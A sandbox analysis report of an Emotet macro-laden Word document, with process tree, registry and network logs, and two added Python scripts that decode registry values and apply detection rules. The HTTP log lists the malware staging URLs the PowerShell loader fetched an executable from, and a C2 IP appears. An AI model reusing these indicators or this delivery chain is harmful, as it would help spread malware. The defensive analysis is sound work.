File name: Archivo_20190918_794027.doc
Full analysis: https://app.any.run/tasks/6adb9f07-b203-471e-9462-65dacd951735
Verdict: Malicious activity
Threats: Emotet
Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded repeatedly into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: September 19, 2019, 09:30:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet-doc, emotet, generated-doc, loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: eyeballs Credit Card Account Ports, Subject: Legacy, Author: Jazmyne Schuppe, Comments: frame context-sensitive, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 11:25:00 2019, Last Saved Time/Date: Wed Sep 18 11:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: EA76E41CE0A651B8DD7BE889F64AC292
SHA1: 34AA46494CC3AEBCB47357A8EE6CD751A3E49B0C
SHA256: 9DA00B02BB8F0BA042F7DEA688F6247E39F3F7F42A180555523AE26938705928
SSDEEP: 6144:Mkpm1VmTG3cBubZMHY6I2KDNTto08WQxqLkI47NSU4jJntATfDocj1jVkA+:Mkpm1VmTG3cBubZMHY6I2KDNTto08WQ+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 553.exe (PID: 3548)
      • 553.exe (PID: 2472)
      • 553.exe (PID: 3456)
      • 553.exe (PID: 924)
      • easywindow.exe (PID: 2468)
      • easywindow.exe (PID: 3432)
      • easywindow.exe (PID: 3500)
      • easywindow.exe (PID: 2372)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2512)
    • Emotet process was detected

      • 553.exe (PID: 2472)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2512)
      • 553.exe (PID: 2472)
    • Executed via WMI

      • powershell.exe (PID: 2512)
    • PowerShell script executed

      • powershell.exe (PID: 2512)
    • Creates files in the user directory

      • powershell.exe (PID: 2512)
    • Starts itself from another location

      • 553.exe (PID: 2472)
    • Application launched itself

      • easywindow.exe (PID: 2468)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2884)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2884)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Stamm
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Boyer - Senger
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:18 10:25:00
CreateDate: 2019:09:18 10:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: frame context-sensitive
Keywords: -
Author: Jazmyne Schuppe
Subject: Legacy
Title: eyeballs Credit Card Account Ports
No data.
Total processes: 44
Monitored processes: 10
Malicious processes: 4
Suspicious processes: 4

Behavior graph (process tree reconstructed from the Parent process column of the table below)

explorer.exe
  └─ WINWORD.EXE (2884)  opens Archivo_20190918_794027.doc; the macro runs on open
wmiprvse.exe
  └─ powershell.exe (2512)  encoded command; downloads the payload
       └─ 553.exe (924)  dropped payload, started by powershell.exe
            └─ 553.exe (3456, 3548, 2472; 2472 flagged #EMOTET)  relaunches itself, the later instances with --12e39b71
                 └─ easywindow.exe (2468)  the payload started again from AppData\Local\easywindow
                      └─ easywindow.exe (3432, 3500, 2372)  relaunches itself, the later instances with --fd47f3b8

WINWORD.EXE is not the recorded parent of powershell.exe: the macro started PowerShell through WMI (the "Executed via WMI" signature above), so the shell appears under wmiprvse.exe. Detection logic that only looks for Office applications spawning PowerShell misses this chain; the WMI provider host spawning a script interpreter is the anchor to look for instead.

Process information

PID 2884  WINWORD.EXE  (parent: explorer.exe)
  CMD:  "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Archivo_20190918_794027.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin  Integrity level: MEDIUM  Exit code: not recorded
  Company: Microsoft Corporation  Description: Microsoft Word  Version: 14.0.6024.1000

PID 2512  powershell.exe  (parent: wmiprvse.exe)
  CMD:  powershell -encod … (the base64 encoded command is not reproduced in this copy of the report)
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Windows PowerShell  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 924  553.exe  (parent: powershell.exe)
  CMD:  "C:\Users\admin\553.exe"
  Path: C:\Users\admin\553.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3456  553.exe  (parent: 553.exe)
  CMD:  "C:\Users\admin\553.exe"
  Path: C:\Users\admin\553.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3548  553.exe  (parent: 553.exe)
  CMD:  --12e39b71
  Path: C:\Users\admin\553.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2472  553.exe  (parent: 553.exe)  flagged #EMOTET
  CMD:  --12e39b71
  Path: C:\Users\admin\553.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2468  easywindow.exe  (parent: 553.exe)
  CMD:  "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3432  easywindow.exe  (parent: easywindow.exe)
  CMD:  "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3500  easywindow.exe  (parent: easywindow.exe)
  CMD:  --fd47f3b8
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin  Integrity level: MEDIUM  Exit code: 0
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2372  easywindow.exe  (parent: easywindow.exe)
  CMD:  --fd47f3b8
  Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
  User: admin  Integrity level: MEDIUM  Exit code: not recorded (still running when the analysis ended)
  Company: Microsoft Corporation  Description: Display Control Panel  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Two things stand out in this table. Every one of the eight payload processes (553.exe and easywindow.exe) presents the version resource of a Windows system component (Microsoft Corporation, "Display Control Panel", 6.1.7601.17514) while living under C:\Users\admin\; a simple check of file path against version metadata, or Authenticode verification, catches that masquerade at once. And every process runs as the admin user at MEDIUM integrity: the chain involves no privilege escalation, which fits the payload installing itself under AppData\Local rather than a system directory. The re-execution pattern is also visible: 553.exe launches itself with --12e39b71, then starts a copy from AppData\Local\easywindow\easywindow.exe, which in turn relaunches itself with --fd47f3b8 (the "Starts itself from another location" and "Application launched itself" signatures).
Total events: 1 730 (read: 1 263, write: 462, delete: 5)

Modification events

All registry modifications listed here come from WINWORD.EXE (PID 2884); none is attributed to powershell.exe, 553.exe or easywindow.exe, so whatever persistence the payload sets up is not visible in this excerpt. What is shown is Word's own housekeeping while opening the document.

(PID 2884) WINWORD.EXE  write
  Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
  Name: ys!
  Value: 79732100440B0000010000000000000000000000

(PID 2884) WINWORD.EXE  write
  Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
  Name: 1033
  Value: Off

(PID 2884) WINWORD.EXE  write
  Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
  Name: 1033
  Value: On

(PID 2884) WINWORD.EXE  write
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
  Name: WORDFiles
  Value: 1328742430

(PID 2884) WINWORD.EXE  write
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
  Name: ProductFiles
  Value: 1328742544

(PID 2884) WINWORD.EXE  write
  Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
  Name: ProductFiles
  Value: 1328742545

(PID 2884) WINWORD.EXE  write
  Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
  Name: MTTT
  Value: 440B00001E187DDFCC6ED50100000000

(PID 2884) WINWORD.EXE  write
  Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
  Name: ct!
  Value: 63742100440B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID 2884) WINWORD.EXE  delete value
  Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
  Name: ct!
  Value: 63742100440B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

(PID 2884) WINWORD.EXE  write
  Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
  Name: UNCAsIntranet
  Value: 0

The ct! value is a UTF-16LE string naming C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm. Word writes a Resiliency\StartupItems entry just before it loads a template or add-in and deletes it once the load has succeeded, so that an item which crashed Word during loading is disabled on the next start. The write/delete pair here is therefore normal template loading, not a persistence mechanism, and the remaining entries (language resources, Installer usage counters, the ZoneMap intranet flag) are equally routine.
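The binary values above are opaque as printed. The script below, an added example that is not part of the ANY.RUN report, decodes them offline. Its reading of the layout is an assumption taken from the bytes themselves rather than from any documented format: each blob opens with the value's own name as ASCII, followed by a DWORD equal to 2884 (0x0B44), the PID of the WINWORD.EXE that wrote it; the ct! value then carries a UTF-16LE path, and MTTT is treated as PID plus a FILETIME, which decodes to 2019-09-19 09:30:27 UTC, eleven seconds after the analysis start time given above. The key names in BLOBS and all function names are the example's own.

```python
"""Decode the binary registry values Word wrote during this run.

Added example, not ANY.RUN's code. The hex blobs are copied from the
"Modification events" list on this page. The field layout is an assumption
read off the bytes, not a documented format: each blob opens with the value's
own name as ASCII, then a DWORD equal to the writing process's PID
(0x0B44 == 2884, the WINWORD.EXE PID); the StartupItems "ct!" value carries
a UTF-16LE path after its header, and the MTTT value a FILETIME.
"""
import re
import struct
from datetime import datetime, timedelta, timezone

BLOBS = {  # key names are this example's own labels
    "StartupItems\\ys!": "79732100440B0000010000000000000000000000",
    "Word\\MTTT": "440B00001E187DDFCC6ED50100000000",
    "StartupItems\\ct!": (
        "63742100440B000004000000000000008C00000001000000840000003E0043003A00"
        "5C00550073006500720073005C00610064006D0069006E005C004100700070004400"
        "6100740061005C0052006F0061006D0069006E0067005C004D006900630072006F00"
        "73006F00660074005C00540065006D0070006C0061007400650073005C004E006F00"
        "72006D0061006C002E0064006F0074006D00000000000000"
    ),
}


def from_hex(dump: str) -> bytes:
    dump = "".join(dump.split())
    if len(dump) % 2:  # tolerate a dump that lost its last nibble when copied
        dump += "0"
    return bytes.fromhex(dump)


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 00:00 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def utf16_strings(blob: bytes, min_chars: int = 4):
    """Yield printable UTF-16LE runs, the way `strings -el` would report them."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    for m in re.finditer(pattern, blob):
        yield m.group().decode("utf-16-le")


def decode_startup_item(blob: bytes) -> dict:
    """Resiliency\\StartupItems value: ASCII name, writer PID, optional path."""
    name = blob[:4].split(b"\0", 1)[0].decode("ascii")
    (pid,) = struct.unpack_from("<I", blob, 4)
    paths = list(utf16_strings(blob))
    return {"name": name, "pid": pid, "path": paths[0] if paths else None}


def decode_mttt(blob: bytes) -> dict:
    """MTTT value, read as writer PID followed by a 64-bit FILETIME."""
    pid, ft = struct.unpack_from("<IQ", blob, 0)
    return {"pid": pid, "time": filetime_to_datetime(ft)}


def decode_all(blobs=BLOBS) -> dict:
    out = {}
    for key, hexdump in blobs.items():
        raw = from_hex(hexdump)
        out[key] = decode_mttt(raw) if key.endswith("MTTT") else decode_startup_item(raw)
    return out


if __name__ == "__main__":
    for key, fields in decode_all().items():
        print(key, fields)
```

Running it prints the Normal.dotm path for ct!, no string for ys!, and a timestamp for MTTT; the PID 2884 recovered from all three blobs is what makes the layout assumption credible, since it matches the process that performed the writes.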
Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files (all by PID 2884, WINWORD.EXE)

C:\Users\admin\AppData\Local\Temp\CVR8BD9.tmp.cvr  (type not recorded; no hashes recorded)

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51FA6147.wmf  (wmf)
  MD5: D4288E0800826368E57BF9592010ADD5
  SHA256: 65D335AC22C2817FF8C848137B62D93B454AE5E2CFECCD1B005B4EC4CED64C47

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF33B4CB.wmf  (wmf)
  MD5: B35A209E6DFCFC143D93F24249DF1CE2
  SHA256: 986DFFB4355B3AA21EFE4E3E7E7108D02DFFD23336E0357D32C43105278AA104

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CC1F783.wmf  (wmf)
  MD5: 175C4216965D3664F742E82BBC69B263
  SHA256: BC383C6F813A79F10A47CB94EC70A454F7AEB5B96C61391F9FAEAAA81EC20876

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA4839F5.wmf  (wmf)
  MD5: EA0C9997579D3523446A8D08E957E954
  SHA256: 3E269C34542807668CE5D957F60623C1C8C9FABFA4C101D2E32193F502AF532A

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\704F08E5.wmf  (wmf)
  MD5: 2C64CC7906851654BECC58E932B54067
  SHA256: 74D486DBCDDC7BDE3D579CB4563C60BE8FCBEB638AB2662B4DF5FF81A1656BC7

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77C1050.wmf  (wmf)
  MD5: 7BBC615196732040F2319BC784EBA98C
  SHA256: BA196AB9440239F9D4EFCE582C3951102302D70A1C94C16B4C98FD8B93698FB5

C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B85CEADE.wmf  (wmf)
  MD5: 0ADBCE2921EE82F18CCE8196C478F3DB
  SHA256: AA626CAE45A76D53F3926325DFACBB19C70B789EC439093223B652A004F5C212

C:\Users\admin\AppData\Local\Temp\~$chivo_20190918_794027.doc  (pgc)
  MD5: 51AAF485E6003F2F9E32ED4DAEC45954
  SHA256: FA83445EC3F0134D31211FA505D0D435736603313614F5FDE9A36CB95AE45872

C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd  (tlb)
  MD5: F5C4313ED089E9A5A74686584864C00F
  SHA256: 133250888A0937A083CD7AF4639700E9D12083734245CBF402F5009E9F122D01

None of these entries is the downloaded payload; this excerpt of the table holds only Word's own temporaries: the WMF files are Word's render cache for images embedded in the document, ~$chivo_... is the owner lock file and the .cvr file is crash-recovery state. MSForms.exd is the type-library cache Word writes when a VBA project references MSForms controls, which corroborates that the macro ran. The two dropped executables counted above are presumably C:\Users\admin\553.exe and C:\Users\admin\AppData\Local\easywindow\easywindow.exe from the process table; their hashes appear only in the full report.
HTTP(S) requests: 4
TCP/UDP connections: 4
DNS requests: 5
Threats: 0

HTTP requests

PID   Process         Method  Code  IP                  URL                                           CN  Type        Size     Reputation
2512  powershell.exe  GET     200   83.137.145.97:80    http://kirstenbijlsma.com/ecp4/mhh20305/      NL  executable  376 Kb   suspicious
2512  powershell.exe  GET     302   129.121.15.236:80   http://brikee.com/gallery/4dcmn72430/         US  html        227 b    suspicious
2512  powershell.exe  GET     404   185.57.197.56:80    http://grupoeq.com/leds/dal52301/             ES  html        273 b    suspicious
2512  powershell.exe  GET     200   129.121.15.236:80   http://brikee.com/cgi-sys/suspendedpage.cgi   US  html        7.12 Kb  suspicious

This is the Emotet loader's download stage: the encoded PowerShell tries several compromised websites over plain HTTP. Here one host served a 376 KB executable, the second redirected to the hosting provider's account-suspended page (cgi-sys/suspendedpage.cgi) and the third returned 404, so two of the three staging sites had already been cleaned up when this sample was run. The executable is what powershell.exe then wrote to disk and started as C:\Users\admin\553.exe (PID 924 in the process table). Responses of type "executable" to a script host, and the same process walking several unrelated domains in quick succession, are the two properties worth alerting on regardless of the specific URLs, which rotate from campaign to campaign.
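The process table and the HTTP table above contain enough structure to write host-side triage rules without any Emotet-specific indicator. The script below is an added example, not ANY.RUN's code or signatures: the PROCS and HTTP records are transcribed from this page (PIDs, paths, parents, version-resource fields, the four requests; the encoded PowerShell argument, which the page does not reproduce, is left as "..."), while the rule names, the list of script hosts and the three-host probing threshold are the example's own assumptions about behaviour a workstation should never show.

```python
"""Triage rules run over the process table and HTTP log of this report.

Added example, not ANY.RUN's code or signatures. PROCS and HTTP are
transcribed from the tables on this page; the rules, their names and the
thresholds are this example's own assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str        # Path column
    cmdline: str      # CMD column
    parent: str       # parent image name as reported by the sandbox
    company: str      # version-resource CompanyName
    description: str  # version-resource FileDescription


@dataclass(frozen=True)
class Http:
    pid: int
    status: int
    url: str
    body_type: str    # the sandbox's classification of the response body


MS, DCP = "Microsoft Corporation", "Display Control Panel"
WORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S553 = r"C:\Users\admin\553.exe"
EASY = r"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"

# Transcribed from the report; "..." stands in for the encoded command,
# which the page does not reproduce.
PROCS = [
    Proc(2884, WORD, f'"{WORD}" /n "C:\\Users\\admin\\AppData\\Local\\Temp\\Archivo_20190918_794027.doc"',
         "explorer.exe", MS, "Microsoft Word"),
    Proc(2512, PS, "powershell -encod ...", "wmiprvse.exe", MS, "Windows PowerShell"),
    Proc(924, S553, f'"{S553}"', "powershell.exe", MS, DCP),
    Proc(3456, S553, f'"{S553}"', "553.exe", MS, DCP),
    Proc(3548, S553, "--12e39b71", "553.exe", MS, DCP),
    Proc(2472, S553, "--12e39b71", "553.exe", MS, DCP),
    Proc(2468, EASY, f'"{EASY}"', "553.exe", MS, DCP),
    Proc(3432, EASY, f'"{EASY}"', "easywindow.exe", MS, DCP),
    Proc(3500, EASY, "--fd47f3b8", "easywindow.exe", MS, DCP),
    Proc(2372, EASY, "--fd47f3b8", "easywindow.exe", MS, DCP),
]
HTTP = [
    Http(2512, 200, "http://kirstenbijlsma.com/ecp4/mhh20305/", "executable"),
    Http(2512, 302, "http://brikee.com/gallery/4dcmn72430/", "html"),
    Http(2512, 404, "http://grupoeq.com/leds/dal52301/", "html"),
    Http(2512, 200, "http://brikee.com/cgi-sys/suspendedpage.cgi", "html"),
]

SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def in_user_profile(path: str) -> bool:
    return path.lower().startswith("c:\\users\\")


def has_encoded_command(cmdline: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, -encod, ...)."""
    return any(len(t) >= 2 and "-encodedcommand".startswith(t.lower())
               for t in cmdline.split() if t.startswith("-"))


def triage(procs, http):
    """Return (rule, pid, detail) findings in discovery order."""
    findings = []
    user_exes = {basename(p.image) for p in procs if in_user_profile(p.image)}
    for p in procs:
        name = basename(p.image)
        if p.parent.lower() == "wmiprvse.exe" and name in SCRIPT_HOSTS:
            findings.append(("wmi_spawned_shell", p.pid, f"{p.parent} -> {name}"))
        if name == "powershell.exe" and has_encoded_command(p.cmdline):
            findings.append(("encoded_powershell", p.pid, p.cmdline))
        if in_user_profile(p.image):
            findings.append(("exec_from_user_profile", p.pid, p.image))
            if p.company == MS:  # Windows-component metadata on a profile-resident file
                findings.append(("version_masquerade", p.pid, f"{p.description} / {p.company}"))
            if p.parent.lower() in user_exes and p.parent.lower() != name:
                findings.append(("relaunch_from_new_location", p.pid, f"{p.parent} -> {p.image}"))
    hosts = defaultdict(set)
    for h in http:
        hosts[h.pid].add(urlparse(h.url).hostname)
        if h.status == 200 and h.body_type == "executable":
            findings.append(("pe_download", h.pid, h.url))
    for pid, seen in hosts.items():
        if len(seen) >= 3:  # one process walking several unrelated hosts
            findings.append(("sequential_url_probe", pid, ", ".join(sorted(seen))))
    return findings


def rules_hit(findings):
    return sorted({f[0] for f in findings})


if __name__ == "__main__":
    for rule, pid, detail in triage(PROCS, HTTP):
        print(f"{rule:28} pid={pid:<5} {detail}")
```

Run against the transcribed data, the rules fire on every payload process and on nothing WINWORD.EXE did, and PID 2512 alone trips four of them (WMI parent, encoded command, PE download, multi-host probing). The parent check uses image names rather than parent PIDs because that is all the report exposes; on a real endpoint the same logic should key on parent PID to avoid a benign wmiprvse.exe elsewhere masking a match.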

Connections

PID   Process         IP                  Domain              ASN                                  CN  Reputation
2512  powershell.exe  83.137.145.97:80    kirstenbijlsma.com  Duocast B.V.                         NL  suspicious
2512  powershell.exe  129.121.15.236:80   brikee.com          Colo4, LLC                           US  suspicious
2512  powershell.exe  185.57.197.56:80    grupoeq.com         Tecnocratica Centro de Datos, S.L.   ES  suspicious
(not attributed)      114.79.134.129:443  (none)              D-Vois Broadband Pvt Ltd             IN  malicious

The one connection rated malicious, to 114.79.134.129:443, has no process or domain attached in this excerpt and no matching entry in the DNS requests below, which is consistent with the Emotet payload contacting a hard-coded C2 address on a residential ISP after the loader stage. Contrast it with the three download hosts, which are ordinary hosting providers reached by name.

DNS requests

Domain              IP               Reputation
brikee.com          129.121.15.236   suspicious
www.echelona.net    (none listed)    unknown
grupoeq.com         185.57.197.56    suspicious
kirstenbijlsma.com  83.137.145.97    suspicious

Threats (network alerts)

PID   Process         Class                                  Message
2512  powershell.exe  Potential Corporate Privacy Violation  ET POLICY PE EXE or DLL Windows file download HTTP
2512  powershell.exe  Potentially Bad Traffic                ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2512  powershell.exe  Misc activity                          ET INFO EXE - Served Attached HTTP

The network summary above counts 0 threats even though three Emerging Threats rules fired; all three are policy or informational rules keyed on a PE being fetched over HTTP by PowerShell, not on an Emotet-specific signature, and none fired on the 114.79.134.129:443 connection.
No debug info